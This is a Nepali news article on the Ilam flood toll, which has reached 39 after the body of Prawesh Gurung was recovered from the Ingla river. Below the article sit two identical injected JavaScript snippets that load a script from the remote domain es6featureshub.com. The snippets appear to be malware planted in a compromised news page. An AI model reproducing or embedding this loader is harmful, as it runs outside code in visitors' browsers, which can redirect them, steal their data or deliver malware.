तपाईँ सुन्दै हुनुहुन्छः

इलाममा मृत्यु हुनेको सङ्ख्या ३९ पुग्यो, बेपत्ता प्रवेश गुरुङको शव फेला

इलाम । इलाम — सन्दकपुर गाउँपालिका–५, इङलामा इङ्ला खोलाले बगाएका २४ वर्षीय प्रवेश गुरुङको शव फेला परेको छ। वडा सदस्य कुमार गुरुङका अनुसार गुरुङको शव घटनास्थलबाट करिब ४०० मिटर तल आज फेला परेको हो।

हिजोदेखि निरन्तर खोजी कार्य जारी थियो। हिजो खोजीका क्रममा गुरुङले लगाएको स्विटर र हाइनेक मात्र भेटिएको थियो। अस्तिको रातिदेखि उनी बेपत्ता रहेका थिए।

योसँगै इलाममा मृत्यु हुनेको सङ्ख्या ३९ पुगेको छ भने एक जना अझै बेपत्ता छन्। इलाम नगरपालिका–६ का महेन्द्र लिम्बु अझै हराइरहेका छन्। उनलाई पहिरोले घरसहित बगाएको बताइएको छ।

;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);

प्रतिक्रिया राख्नुहोस्

Back to top button